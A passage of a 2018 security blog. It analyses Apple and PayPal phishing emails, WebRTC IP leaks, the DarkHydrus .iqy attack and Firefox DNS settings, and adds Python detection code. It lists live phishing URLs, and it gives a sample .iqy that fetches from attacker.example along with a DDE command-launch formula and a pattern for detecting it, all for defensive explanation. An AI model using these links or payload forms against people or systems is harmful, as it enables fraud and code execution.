Thursday, August 30, 2018

Apple Phishing Email - Re : [Order Receipt] Thanks for your Order Number: Sxxxxxxxxx, Your order will be processed. we will send a confirmation email after your order has been shipped.

For the record, this is an Apple phishing email that is currently going around and made it through spam filters. What to do? Report it; see the bottom of the page for instructions.



From: AppIe Store (look closely: that is a capital I standing in for the lowercase l in "Apple", a look-alike that survives a quick glance)

Subject: Re : [Order Receipt] Thanks for your Order Number: Sxxxxxxxxx, Your order will be processed. we will send a confirmation email after your order has been shipped.




It carries a malicious PDF attachment: Order_S794652016.pdf

Uploading it to http://jsunpack.jeek.org/, which unpacks any JavaScript inside a PDF, we find:

PHISHING LINK

https://mails-delveryerrorpaybills66414.masihdomainjdskk.com/Do&post=494528155_17&cc_key=461

The hostname is nowhere near apple.com, which is all you need to know.


How to tell this is a Phishing email ?

  1. Check the sender's email address in full, not just the display name; if the domain is not the originating company's, it's phishing.
  2. Hover over every link in the email; if the destination hostname is not on apple.com (the whole hostname, not just a string that happens to contain "apple"), don't click.
  3. The best way is to look at the message source, see below.

How to examine Email Message Source ?

Now let's look at the message source:
  1. Outlook.com->Actions->View Message Source.
  2. Gmail.com->More (down arrow, top right)->Show original.
Check the From and Return-Path addresses, the Authentication-Results header (the SPF, DKIM and DMARC verdicts) and every link in the body: anything that does not originate from apple.com is a red flag.
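One way to run those checks on a saved message source, as an added example that is not part of the original post: it parses the raw headers and HTML body with Python's standard library, undoes common look-alike substitutions in the display name (so the "AppIe Store" above, or the "PayPaI Confirmation" in a post further down, is recognised as an imitation of the brand), compares the From domain with the expected one, reads the SPF, DKIM and DMARC verdicts out of Authentication-Results, and lists links whose hostname is not under apple.com. The message is constructed for the example, with only the link host taken from the PDF above; the confusable table and the brand list are assumptions.

```python
import email
import email.policy
import re
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed message source, modelled on the post's headers. The Return-Path,
# Authentication-Results and addresses are invented; the link host is the one
# found in the PDF above.
SAMPLE_EML = b"""\
Return-Path: <bounce@masihdomainjdskk.com>
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=masihdomainjdskk.com; dkim=none; dmarc=none
From: "AppIe Store" <orders@masihdomainjdskk.com>
To: victim@example.net
Subject: Re : [Order Receipt] Thanks for your Order
Content-Type: text/html; charset="utf-8"

<html><body><p>Your order will be processed.</p>
<a href="https://mails-delveryerrorpaybills66414.masihdomainjdskk.com/Do">View your order</a>
<a href="https://www.apple.com/legal/">Terms</a></body></html>
"""

# Look-alike characters commonly swapped into brand names (assumed subset).
CONFUSABLES = str.maketrans({"I": "l", "1": "l", "|": "l", "0": "o", "5": "s", "3": "e"})
BRANDS = {"apple", "icloud", "paypal"}


class LinkCollector(HTMLParser):
    """Collects every href from <a> tags in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.links.append(href)


def in_domain(host, domain):
    """True only if host is domain itself or a subdomain of it (apple.com.evil.net fails)."""
    host, domain = host.lower(), domain.lower()
    return host == domain or host.endswith("." + domain)


def brand_claimed(display_name):
    """Return (brand, used_lookalikes) if the display name spells a known brand,
    possibly with look-alike characters such as the capital I in 'AppIe'."""
    for word in re.findall(r"[A-Za-z0-9|]+", display_name):
        normalized = word.translate(CONFUSABLES).lower()
        if normalized in BRANDS:
            return normalized, normalized != word.lower()
    return None, False


def domain_of(address):
    return address.rsplit("@", 1)[-1].lower() if "@" in address else ""


def analyze(raw, expected_domain):
    """Examine raw message source and return the findings a reviewer would look for."""
    msg = email.message_from_bytes(raw, policy=email.policy.default)
    name, addr = parseaddr(msg.get("From", ""))
    sender_domain = domain_of(addr)
    return_domain = domain_of(parseaddr(msg.get("Return-Path", ""))[1])
    auth = dict(re.findall(r"\b(spf|dkim|dmarc)=(\w+)",
                           msg.get("Authentication-Results", "")))
    brand, lookalike = brand_claimed(name)

    body = msg.get_body(preferencelist=("html", "plain"))
    collector = LinkCollector()
    if body is not None:
        collector.feed(body.get_content())
    bad_links = [u for u in collector.links
                 if not in_domain(urlsplit(u).hostname or "", expected_domain)]

    reasons = []
    if not in_domain(sender_domain, expected_domain):
        reasons.append(f"From address is at {sender_domain!r}, not {expected_domain}")
    if brand and lookalike:
        reasons.append(f"display name {name!r} imitates {brand} with look-alike characters")
    # SPF and DKIM can pass for the attacker's own domain, so only the DMARC result,
    # which is tied to the From domain, says anything about the brand being claimed.
    if auth.get("dmarc") != "pass":
        reasons.append(f"DMARC result is {auth.get('dmarc', 'absent')}")
    if bad_links:
        reasons.append(f"{len(bad_links)} link(s) point outside {expected_domain}")
    return {
        "from_name": name, "sender_domain": sender_domain, "return_domain": return_domain,
        "brand": brand, "lookalike": lookalike, "auth": auth, "bad_links": bad_links,
        "reasons": reasons, "phishing": bool(reasons),
    }


if __name__ == "__main__":
    for reason in analyze(SAMPLE_EML, "apple.com")["reasons"]:
        print("-", reason)
```

SPF passes in the sample because the attacker's own domain authorises its own mail server, which is exactly why a green SPF result proves nothing about the brand; to check a real message, replace SAMPLE_EML with the bytes of the saved source.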


Report Phishing Email (not as Spam)

  1. Outlook.com->Junk (at top)->Phishing Scam
  2. Gmail.com->More (down arrow, top right)->Report Phishing

Report Phishing URLs at Google now

If you have received this email, take further action now by submitting the phishing URL here:

  1. https://www.google.com/safebrowsing/report_phish/


Report phishing at Microsoft and government agencies

  1. http://www.microsoft.com/security/online-privacy/phishing-faq.aspx

Report phishing emails to Apple 

Forward the email to abuse@icloud.com. This provides Apple's legal department and law enforcement with useful information to help prevent future phishing emails.

Wednesday, August 29, 2018

PayPal Phishing Email - [ New Report Reminder ] Statement update login issue Wednesday, 29 August, 2018

For the record, this is a PayPal phishing email that is currently going around and made it through spam filters. What to do? Report it; see the bottom of the page for instructions.


From: PayPal Support <noreply....@lompatguagebutaslimengkelanjing.com> (the display name says PayPal; the address domain is nothing of the sort)

Subject: [ New Report Reminder ] Statement update login issue Wednesday, 29 August, 2018

Attachment: #Summary.doc

Contents of the Word document:

Your account access is limited

Dear Customer

We noticed some unsual activity on your PayPal account and are concerned about potential unauthorized account access.

What's going on?
We want to help ensure PayPal is a secure place to do business. We noticed some changes in your account that require further verification. During this time, you may not have access to certain account activities. Please review the Account impact section for more information about what you can and cannot do.

Impact on account: Medium

Account impact

 Receive money or payments
 Pay using PayPal
 Refund money to customers
 Send money or payments
 Withdraw money from PayPal

What to do next

Please log in to your PayPal account and complete the steps to confirm your identity and recent account activity. To help protect your account, access will remain limited until you complete the necessary steps.

SPAM LINK --> Login To PayPal

Thank you for your understanding and cooperation.

Sincerely

PayPal

Malicious Link

The "Login To PayPal" button points to http://go2l.ink/1tFW, a URL shortener.
http://urlexpander.net/ expands it to https://paypal-restore.ca, which is not a PayPal domain, however much the name wants you to think so.

Interestingly, the final URL in the chain is live and served over HTTPS, so the padlock in the address bar proves nothing about who is behind it.

Very convincing phishing site.

How to tell this is a Phishing email ?

  1. Check the sender's email address in full, not just the display name; if the domain is not the originating company's, it's phishing.
  2. Hover over every link in the email and check that the destination hostname really is on the company's own domain (here paypal.com), not a look-alike or a shortener.
  3. The best way is to look at the message source, see below.

How to examine Email Message Source ?

Now let's look at the message source:
  1. Outlook.com->Actions->View Message Source.
  2. Gmail.com->More (down arrow, top right)->Show original.
Check the From and Return-Path addresses, the Authentication-Results header (the SPF, DKIM and DMARC verdicts) and every link in the body: anything that does not originate from paypal.com is a red flag.


Report Phishing Email (not as Spam)

  1. Outlook.com->Junk (at top)->Phishing Scam
  2. Gmail.com->More (down arrow, top right)->Report Phishing

Report Phishing URLs at Google now

If you have received this email, take further action now by submitting the phishing URL here:

  1. https://www.google.com/safebrowsing/report_phish/


Report phishing at Microsoft and government agencies

  1. http://www.microsoft.com/security/online-privacy/phishing-faq.aspx

Report phishing emails to Apple 

Forward the email to abuse@icloud.com. This provides Apple's legal department and law enforcement with useful information to help prevent future phishing emails.


Report phishing emails to PayPal

“Phishing” is an illegal attempt to "fish" for your private, sensitive data. One of the most common phishing scams involves sending an email that fraudulently claims to be from a well-known company (like PayPal). If you believe you've received a phishing email, follow these steps right away:
  1. Forward the entire email to spoof@paypal.com.
  2. Do not alter the subject line or forward the message as an attachment.
  3. Delete the suspicious email from your inbox.

Monday, August 20, 2018

How to Fully Turn off collection of Location data in Google

Turning off Location History on an Android smartphone doesn't prevent Google from knowing where you've been. Such data is collected in several other ways – for example, when someone uses Google Maps.

How to Turn Location History on or off

On your computer, visit the Google Location History page and turn it off (it will then show as "paused").

To fully turn off the collection of location data, you need to log into your Google account and then navigate to "Web & App Activity" under Activity controls. There you have the option to turn off data collection. This can be done via the Google app on an Android smartphone or by using the browser on a computer.

According to Google, when Web & App Activity is turned on, a user's searches and activity from other Google services are saved to their account in the interests of "better search results and suggestions".

Users can see and delete their searches and browsing activity by visiting "My Activity" while logged into their Google account.

How to Turn Web & App Activity on or off

  1. On your computer, visit the Activity controls page. You may be asked to sign in to your Google Account.
  2. Turn Web & App Activity on or off.
  3. If you turn the switch on, you can check the box next to "Include Chrome browsing history and activity from websites and apps that use Google services."

Monday, August 13, 2018

WebRTC allows a website to directly detect your host machine's true IP address, circumventing VPNs

Unfortunately for VPN users, WebRTC allows a website (or any other WebRTC endpoint) to learn your host machine's real IP addresses regardless of the proxy or VPN you use: while gathering ICE candidates the browser reports its local interface addresses (host candidates) and asks a STUN server which address it is seen from (server-reflexive candidates), and a VPN that does not carry that UDP traffic is simply bypassed. The candidates are handed straight to the page's JavaScript; nothing has to be clicked.

Interestingly, only Internet Explorer did not leak this information natively, because it does not implement WebRTC at all. Edge, Chrome, Firefox and Opera did.


Testing for WebRTC IP Leakage

Visit Daniel Roesler's https://diafygi.github.io/webrtc-ips/ to see whether a local or public IP address appears that should have stayed behind the VPN.

https://ipleak.net/ is another tool that detects whether your browser is vulnerable to a WebRTC leak.
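Both test pages work by creating an RTCPeerConnection and reading the addresses out of the ICE candidates the browser gathers. As an added example, not code from either site, here is a parser for those candidate lines (constructed here, but in the format that onicecandidate delivers and that chrome://webrtc-internals shows) that says which address each candidate exposes and whether the address a STUN server saw matches your VPN's exit address. The addresses in the sample and the VPN exit address in the test are invented.

```python
import ipaddress
import re

# Constructed candidate lines in the format RTCPeerConnection.onicecandidate delivers.
# Addresses are invented: 192.168.1.23 plays the LAN address, 81.2.69.142 the real
# uplink address a STUN server sees, 203.0.113.9 a TURN relay, and the last line shows
# the .local mDNS name current browsers substitute for a host address.
SAMPLE_CANDIDATES = [
    "candidate:842163049 1 udp 2122260223 192.168.1.23 54321 typ host generation 0",
    "candidate:842163049 2 udp 2122260222 192.168.1.23 54322 typ host generation 0",
    "candidate:1467250027 1 udp 1686052607 81.2.69.142 54321 typ srflx raddr 192.168.1.23 rport 54321 generation 0",
    "candidate:3098175849 1 udp 41885439 203.0.113.9 3478 typ relay raddr 81.2.69.142 rport 54321 generation 0",
    "candidate:1000 1 udp 2122260223 4e1a9c3b-7d0f-4f3a-9c2e-1234567890ab.local 61000 typ host generation 0",
]

CANDIDATE_RE = re.compile(
    r"candidate:(?P<foundation>\S+)\s+(?P<component>\d+)\s+(?P<transport>\S+)\s+"
    r"(?P<priority>\d+)\s+(?P<address>\S+)\s+(?P<port>\d+)\s+typ\s+(?P<type>\S+)"
)


def parse_candidate(line):
    """Split one ICE candidate line into its fields, or return None if it is not one."""
    m = CANDIDATE_RE.search(line)
    return m.groupdict() if m else None


def classify(candidate):
    """Say what a candidate exposes: a LAN address, the real public address, a relay, or nothing."""
    address, ctype = candidate["address"], candidate["type"]
    if address.endswith(".local"):
        return "mdns"          # hostname obfuscation, no address revealed
    try:
        ip = ipaddress.ip_address(address)
    except ValueError:
        return "unknown"
    if ctype == "relay":
        return "relay"         # the TURN server's address, not yours
    if ctype == "srflx":
        return "public"        # your address as the STUN server saw it
    if ip.is_private or ip.is_link_local or ip.is_loopback:
        return "local"         # host candidate on a private interface
    return "public"            # host candidate on a directly routed interface


def assess(lines, vpn_exit_ip=None):
    """Collect leaked addresses and decide whether the VPN was bypassed."""
    local, public = [], []
    for line in lines:
        cand = parse_candidate(line)
        if cand is None:
            continue
        kind = classify(cand)
        if kind == "local" and cand["address"] not in local:
            local.append(cand["address"])
        elif kind == "public" and cand["address"] not in public:
            public.append(cand["address"])
    # Any public address that is not the VPN's exit means the STUN traffic left outside the tunnel.
    bypassed = bool(vpn_exit_ip) and any(ip != vpn_exit_ip for ip in public)
    return {"local_ips": local, "public_ips": public,
            "vpn_bypassed": bypassed, "leaks": bool(local or public)}


if __name__ == "__main__":
    print(assess(SAMPLE_CANDIDATES, vpn_exit_ip="203.0.113.1"))
```

Host candidates give away LAN addresses, srflx candidates the address the STUN server saw (which equals the VPN's exit address only if the VPN tunnels the browser's UDP), and relay candidates belong to the TURN server. Current browsers replace host addresses with .local mDNS names, which the classifier counts as no leak; an older browser, or a page that has been granted camera or microphone access, still reports the raw addresses.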
How to Prevent WebRTC IP Leakage

Install uBlock Origin, then open its dashboard, go to the Settings tab and under Privacy tick "Prevent WebRTC from leaking local IP addresses"; this is off by default, so installing the extension alone does not help. In Firefox you can also switch WebRTC off outright by setting media.peerconnection.enabled to false in about:config.
Or you can install Google's official Chrome extension WebRTC Network Limiter, but it must be configured with the last option, "Use my proxy server", or the leak continues.

uBlock Origin is available for all the major browsers, including Edge.

Saturday, August 11, 2018

PayPal Phishing Email - [Transaction Confirmation] - You've made a purchase from JohnLewis, Ltd. on 11/08/2018

For the record, this is a PayPal phishing email that is currently going around and made it through spam filters. What to do? Report it; see the bottom of the page for instructions.



From: PayPaI Confirmation (again a capital I in place of the lowercase l in "PayPal")

Subject: [Transaction Confirmation] You've made a purchase from JohnLewis, Ltd. on 11/08/2018

Keywords: Oakley OO9262 Men's Sliver Polarised Sunglasses, Blue




The Account Management button goes to

https://t.co/XVzOpRcdGI?Allahuakbar, a Twitter shortener link, which expands to https://komporgas.net/AllahItuAdil


http://urlexpander.net/ flags it: "[Alert] - High risk that the target link / website is harmful and dangerous !"
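The shortener chains in this post and in the PayPal post of August 29 are the same trick, so here is one added example for both (my code, not the blog's or urlexpander.net's): it pulls every link and its visible text out of the HTML body, follows redirects one hop at a time, and reports any link that does not land under paypal.com, flagging shorteners along the way. The HTML body and the redirect table are constructed from the two posts' links, the look-alike hostname is invented, and the shortener list is an assumption; live_resolve shows how a real hop is fetched with a HEAD request that does not follow redirects, but the example run stays offline.

```python
import urllib.error
import urllib.request
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed HTML body with the two buttons seen in the posts, a genuine link,
# and a look-alike hostname invented for the example.
SAMPLE_HTML = """
<a href="http://go2l.ink/1tFW">Login To PayPal</a>
<a href="https://t.co/XVzOpRcdGI?Allahuakbar">Account Management</a>
<a href="https://paypal.com.account-verify.example/login">Confirm your identity</a>
<a href="https://www.paypal.com/help">Help</a>
"""

# Constructed stand-in for the Location headers the shorteners returned
# (the destinations are the ones urlexpander.net reported in the posts).
SAMPLE_REDIRECTS = {
    "http://go2l.ink/1tFW": "https://paypal-restore.ca",
    "https://t.co/XVzOpRcdGI?Allahuakbar": "https://komporgas.net/AllahItuAdil",
}

SHORTENERS = {"t.co", "go2l.ink", "bit.ly", "goo.gl", "tinyurl.com", "ow.ly"}  # assumed list
MAX_HOPS = 10


class AnchorCollector(HTMLParser):
    """Collects (visible text, href) for every <a> so text and target can be compared."""

    def __init__(self):
        super().__init__()
        self.anchors, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href"), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append(("".join(self._text).strip(), self._href))
            self._href = None


def host_of(url):
    return (urlsplit(url).hostname or "").lower()


def in_domain(host, domain):
    """Suffix match on a label boundary: paypal.com.account-verify.example fails."""
    return host == domain or host.endswith("." + domain)


def expand(url, resolve, max_hops=MAX_HOPS):
    """Follow one redirect at a time and return the whole chain, stopping on loops."""
    chain = [url]
    while len(chain) <= max_hops:
        nxt = resolve(chain[-1])
        if not nxt or nxt in chain:
            break
        chain.append(nxt)
    return chain


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # make urllib raise instead of following the redirect


def live_resolve(url, timeout=10):
    """One HEAD request; returns the Location of a 3xx answer, else None.
    Not used by the example run, which stays offline."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        opener.open(urllib.request.Request(url, method="HEAD"), timeout=timeout)
    except urllib.error.HTTPError as err:
        if err.code in (301, 302, 303, 307, 308):
            return err.headers.get("Location")
    except urllib.error.URLError:
        pass
    return None


def audit_links(html, expected_domain, resolve):
    """Expand every link and report those that do not end up under expected_domain."""
    collector = AnchorCollector()
    collector.feed(html)
    findings = []
    for text, href in collector.anchors:
        chain = expand(href, resolve)
        final_host = host_of(chain[-1])
        reasons = []
        if host_of(href) in SHORTENERS:
            reasons.append("shortener hides the destination")
        if not in_domain(final_host, expected_domain):
            reasons.append(f"lands on {final_host}, not {expected_domain}")
        findings.append({"text": text, "href": href, "chain": chain,
                         "final_host": final_host, "reasons": reasons,
                         "suspicious": bool(reasons)})
    return findings


if __name__ == "__main__":
    for f in audit_links(SAMPLE_HTML, "paypal.com", SAMPLE_REDIRECTS.get):
        print(f["text"], "->", " -> ".join(f["chain"]), f["reasons"])
```

Pass live_resolve instead of SAMPLE_REDIRECTS.get to expand real links, bearing in mind that some shorteners answer a HEAD with a 200 page and a meta refresh rather than a 3xx, and that expanding a phishing link from your own address tells the operator the link was opened.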

How to tell this is a Phishing email ?

  1. Check the sender's email address in full, not just the display name; if the domain is not the originating company's, it's phishing.
  2. Hover over every link in the email; if the destination hostname is not on paypal.com (the whole hostname, not a look-alike or a shortener), don't click.
  3. The best way is to look at the message source, see below.

How to examine Email Message Source ?

Now let's look at the message source:
  1. Outlook.com->Actions->View Message Source.
  2. Gmail.com->More (down arrow, top right)->Show original.
Check the From and Return-Path addresses, the Authentication-Results header (the SPF, DKIM and DMARC verdicts) and every link in the body: anything that does not originate from paypal.com is a red flag.


Report Phishing Email (not as Spam)

  1. Outlook.com->Junk (at top)->Phishing Scam
  2. Gmail.com->More (down arrow, top right)->Report Phishing

Report Phishing URLs at Google now

If you have received this email, take further action now by submitting the phishing URL here:

  1. https://www.google.com/safebrowsing/report_phish/


Report phishing at Microsoft and government agencies

  1. http://www.microsoft.com/security/online-privacy/phishing-faq.aspx

Report phishing emails to Apple 

Forward the email to abuse@icloud.com. This provides Apple's legal department and law enforcement with useful information to help prevent future phishing emails.


Report phishing emails to PayPal

“Phishing” is an illegal attempt to "fish" for your private, sensitive data. One of the most common phishing scams involves sending an email that fraudulently claims to be from a well-known company (like PayPal). If you believe you've received a phishing email, follow these steps right away:
  1. Forward the entire email to spoof@paypal.com.
  2. Do not alter the subject line or forward the message as an attachment.
  3. Delete the suspicious email from your inbox.

Friday, August 10, 2018

New Threat Actor Group DarkHydrus uses Excel Web Query (.iqy) attachments to launch PowerShell

Palo Alto Networks Unit 42 detected a campaign by a new threat actor group, dubbed DarkHydrus, whose emails carried malicious Excel Web Query files (.iqy). An .iqy file is a plain-text file containing a URL, and Excel opens it by default; no macro is involved.

Microsoft Excel natively opens .iqy files and uses the URL in the file to pull remote data into the spreadsheet. By default Excel does not download data from the remote server without the user's consent, which it asks for with the dialog box in Figure 1:


Figure 1 Excel security notice for .iqy files
By enabling this data connection, the user allows Excel to obtain content from the URL in the .iqy file. The releasenotes.txt file it fetched (SHA256: bf925f340920111b385078f3785f486fff1096fd0847b993892ff1ee3580fa9d) contains a formula, reproduced in the Unit 42 write-up linked below, that Excel saves to the A0 cell in the worksheet and evaluates; that is the step that launches PowerShell.


Source: https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/
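To recognise such an attachment before anyone clicks Enable, here is an added example (mine, not Unit 42's code): a parser for the .iqy text format, which is the word WEB on the first line, a version number on the second and the query URL on the third, followed by optional name=value settings; an assessment that flags an untrusted or cleartext URL; and a scan of the text the URL returns for DDE-style formulas of the shape =application|'arguments'!cell, the construct Excel evaluates once the data connection is allowed. The sample .iqy and the sample remote text are constructed, the hostname is invented, and the actor's actual formula is not reproduced here.

```python
import re
from urllib.parse import urlsplit

# Constructed .iqy in the format Unit 42 describes; the host is invented and is
# not the one the campaign used.
SAMPLE_IQY = (
    "WEB\r\n"
    "1\r\n"
    "http://updates.attacker.example/releasenotes.txt\r\n"
    "\r\n"
    "Selection=AllTables\r\n"
    "Formatting=None\r\n"
)

# Constructed stand-in for the text the server returns; Excel imports it as cell
# data and evaluates anything that parses as a formula. This one only echoes.
SAMPLE_REMOTE = "=cmd|' /c echo test'!A0\r\n"

QUERY_EXTENSIONS = {".iqy", ".oqy", ".rqy", ".dqy"}  # Excel query files that fetch external data
DDE_RE = re.compile(r"^\s*=\s*\w+\s*\|.*!\s*[A-Za-z]+\d+")  # =app|'args'!cell


def parse_iqy(text):
    """Return version, URL and options from an Excel web query file."""
    lines = text.splitlines()
    if len(lines) < 3 or lines[0].strip().upper() != "WEB":
        raise ValueError("not an Excel web query (.iqy) file")
    options = {}
    for line in lines[3:]:
        if "=" in line:
            key, value = line.split("=", 1)
            options[key.strip()] = value.strip()
    return {"version": lines[1].strip(), "url": lines[2].strip(), "options": options}


def assess_iqy(text, trusted_domains=()):
    """Flag a query file whose URL is cleartext or points at a host you do not trust."""
    query = parse_iqy(text)
    parts = urlsplit(query["url"])
    host = (parts.hostname or "").lower()
    reasons = []
    if parts.scheme != "https":
        reasons.append(f"fetches over {parts.scheme or 'unknown scheme'}, not https")
    if not any(host == d or host.endswith("." + d) for d in trusted_domains):
        reasons.append(f"untrusted host {host or '(none)'}")
    return {"url": query["url"], "host": host, "reasons": reasons,
            "suspicious": bool(reasons)}


def dde_formulas(remote_text):
    """Return the lines of fetched content that Excel would treat as DDE launch formulas."""
    return [line.strip() for line in remote_text.splitlines() if DDE_RE.match(line)]


def is_query_attachment(filename):
    """True for attachment names that Excel will open as an external data query."""
    return any(filename.lower().endswith(ext) for ext in QUERY_EXTENSIONS)


if __name__ == "__main__":
    print(assess_iqy(SAMPLE_IQY, trusted_domains=("corp.example",)))
    print(dde_formulas(SAMPLE_REMOTE))
```

The extension check matters at the mail gateway: the file is plain text, so nothing about its content trips a macro scanner, and the payload only arrives after the user clicks Enable.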

Thursday, August 9, 2018

How to Make Windows 10 Accept File Paths Over 260 Characters

Microsoft has a core set of application programming interfaces (APIs) that programmers can use to interact with applications in the Windows operating system. These programming interfaces are often referred to as the Windows API. The Windows API hard-coded a maximum filename length called MAX_PATH such that a filename, including the file path to get to the file, can't exceed 260 characters. 

A path must meet these criteria, where a is the directory and b is the file name:

  a + b <= 260 characters, counting the terminating null
  1. The file name with extension (b), e.g. filename.txt, together with its directory must fit within 260 characters.
  2. The directory name (a), e.g. c:\dir1\dir2, must be less than 248 characters.
  3. Combined, a + b must be less than 260 characters.

Windows Explorer (renamed File Explorer in Windows 10) is built on the Windows API and fails when copying long paths.

Windows 10 (version 1607 and later, the Creators Update included) tried to address this with a registry setting to enable long paths, but File Explorer still fails.

Windows 10 registry setting (only programs whose manifest declares longPathAware benefit; File Explorer is not one of them):

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem]
"LongPathsEnabled"=dword:00000001


However, because this is a limitation of the Windows API and not the file system used on the majority of Windows installations (NTFS), some programs can create filenames that violate this limit.

Online Backups will fail

Back-ups to cloud providers such as OneDrive, Google Drive and Dropbox fail with "path too long" errors as well. You may not even see the errors unless you check the logs, which most users do not.



How to automatically fix Paths Too Long ?

Path Too Long Auto Fixer is the first tool of its kind to automatically fix paths that are too long.

It finds every directory and file name that is too long and corrects it automatically, so that your next back-up does not fail.

Download the free demo at https://pathtoolongautofixer.blogspot.com

Preview

How are Paths Too Long created?

Programs that bypass the Windows API limit, such as command-line tools, torrent clients and unzip utilities, can create them; for example, in the command shell:
mkdir "\\?\C:\very long path"

The NTFS file system actually supports paths of up to 32,767 characters, and you can use such paths yourself by calling the Unicode (or "wide") versions of the Windows API functions and prefixing the path with \\?\, as in the example above.

Most commonly they appear when you copy files or back up a hard drive or USB stick from another system.

If you share or mount an NTFS disk from a Mac or Linux system you can also run into paths that are too long, since those systems allow much longer paths.

Maximum Path Length Limitation -  Technical Details


In the Windows API (with some exceptions discussed in the following paragraphs), the maximum length for a path is MAX_PATH, which is defined as 260 characters. A local path is structured in the following order: drive letter, colon, backslash, name components separated by backslashes, and a terminating null character. For example, the maximum path on drive D is "D:\some 256-character path string<NUL>" where "<NUL>" represents the invisible terminating null character for the current system codepage. (The characters < > are used here for visual clarity and cannot be part of a valid path string.)
Note  File I/O functions in the Windows API convert "/" to "\" as part of converting the name to an NT-style name, except when using the "\\?\" prefix as detailed in the following sections.
The Windows API has many functions that also have Unicode versions to permit an extended-length path for a maximum total path length of 32,767 characters. This type of path is composed of components separated by backslashes, each up to the value returned in the lpMaximumComponentLength parameter of the GetVolumeInformation function (this value is commonly 255 characters). To specify an extended-length path, use the "\\?\" prefix. For example, "\\?\D:\very long path".

Note  The maximum path of 32,767 characters is approximate, because the "\\?\" prefix may be expanded to a longer string by the system at run time, and this expansion applies to the total length.

The "\\?\" prefix can also be used with paths constructed according to the universal naming convention (UNC). To specify such a path using UNC, use the "\\?\UNC\" prefix. For example, "\\?\UNC\server\share", where "server" is the name of the computer and "share" is the name of the shared folder. These prefixes are not used as part of the path itself. They indicate that the path should be passed to the system with minimal modification, which means that you cannot use forward slashes to represent path separators, or a period to represent the current directory, or double dots to represent the parent directory. Because you cannot use the "\\?\" prefix with a relative path, relative paths are always limited to a total of MAX_PATH characters.


Wednesday, August 8, 2018

Cloudflare DNS resolver for Mozilla is a privacy violation and will kill its popularity

Mozilla recently announced that Firefox would begin sending its DNS queries to Cloudflare's DNS-over-HTTPS resolver, overriding the resolver configured on the user's system.

https://blog.sucuri.net/2017/12/cloudflare-solutions-keylogger-on-thousands-of-infected-wordpress-sites.html (note that the "cloudflare.solutions" domain in that report was a malware domain trading on Cloudflare's name, not Cloudflare's own infrastructure)

Cloudflare runs one of the world's largest networks, serving more than 10 trillion requests per month, which the company says is nearly 10 percent of all Internet requests, spanning more than 2.5 billion people worldwide. But big is not always better, as it has been the target of numerous hacks. So what is Mozilla thinking?

Moreover, your applications shouldn't be deciding your DNS settings; no app should override your local DNS configuration. Anybody with visibility into your resolver queries knows a lot about your online habits, including which websites you visit.

This is a very serious privacy issue and will lead to many dropping Firefox as a browser.

Further reading:

  • https://blog.ungleich.ch/en-us/cms/blog/2018/08/04/mozillas-new-dns-resolution-is-dangerous/
  • https://gioxx.org/2018/08/01/firefox-dns-over-https/
  • https://blog.nightly.mozilla.org/2018/06/01/improving-dns-privacy-in-firefox/ 


Disabling it pre-emptively:

  • Enter about:config in the Firefox address bar
  • Search for network.trr
  • Set network.trr.mode = 5 to turn it off completely (0 is "off by default", which a future Mozilla rollout can change; 5 records an explicit opt-out)
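To check what a profile actually does rather than trust the dialog, here is an added example (not Mozilla's code): it reads user_pref lines from a profile's prefs.js or user.js, maps network.trr.mode to what each value does, and says whether hostnames would be sent to the trusted recursive resolver. The two pref snippets are constructed; the mode meanings are Firefox's own, and the Cloudflare URI is the one the experiment text below names.

```python
import re

# What each network.trr.mode value does (Firefox's definitions).
TRR_MODES = {
    0: "off by default: native resolver only, but a Mozilla rollout may change it",
    1: "race native and TRR, first answer wins",
    2: "TRR first, native resolver as fallback",
    3: "TRR only, no native fallback",
    4: "shadow mode: native answer used, every name also sent to the TRR for telemetry",
    5: "off by user choice: native resolver only, an explicit opt-out",
}
MODES_THAT_SEND_NAMES = {1, 2, 3, 4}

PREF_RE = re.compile(r'^\s*user_pref\("(?P<name>[^"]+)",\s*(?P<value>.+?)\);\s*$', re.M)

# Constructed profile excerpts: what the Nightly experiment sets, and the opt-out.
SAMPLE_EXPERIMENT = '''
user_pref("network.trr.mode", 4);
user_pref("network.trr.uri", "https://dns.cloudflare.com/.well-known/dns");
user_pref("network.trr.bootstrapAddress", "1.1.1.1");
'''
SAMPLE_OPT_OUT = 'user_pref("network.trr.mode", 5);\n'


def parse_prefs(text):
    """Read user_pref(...) lines into a dict with int, bool or str values."""
    prefs = {}
    for m in PREF_RE.finditer(text):
        raw = m.group("value").strip()
        if raw.startswith('"') and raw.endswith('"'):
            value = raw[1:-1]
        elif raw in ("true", "false"):
            value = raw == "true"
        else:
            try:
                value = int(raw)
            except ValueError:
                value = raw
        prefs[m.group("name")] = value
    return prefs


def trr_status(prefs):
    """Summarise whether this profile sends hostnames to a trusted recursive resolver."""
    mode = prefs.get("network.trr.mode", 0)
    if not isinstance(mode, int):
        mode = 0
    return {
        "mode": mode,
        "meaning": TRR_MODES.get(mode, "unknown mode"),
        "uri": prefs.get("network.trr.uri", ""),
        "sends_names_to_trr": mode in MODES_THAT_SEND_NAMES,
        "opted_out": mode == 5,
    }


def trr_status_from_file(path):
    """Convenience wrapper for a real prefs.js or user.js in a Firefox profile directory."""
    with open(path, encoding="utf-8") as fh:
        return trr_status(parse_prefs(fh.read()))


if __name__ == "__main__":
    print(trr_status(parse_prefs(SAMPLE_EXPERIMENT)))
    print(trr_status(parse_prefs(SAMPLE_OPT_OUT)))
```

Note the difference between the two "off" values: a profile with no network.trr.mode line at all is in mode 0 and reports opted_out False, because that is precisely the state an experiment or rollout is allowed to change.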

Feature discussion:

  The Bugzilla discussion about the new TRR (Trusted Recursive Resolver) says:

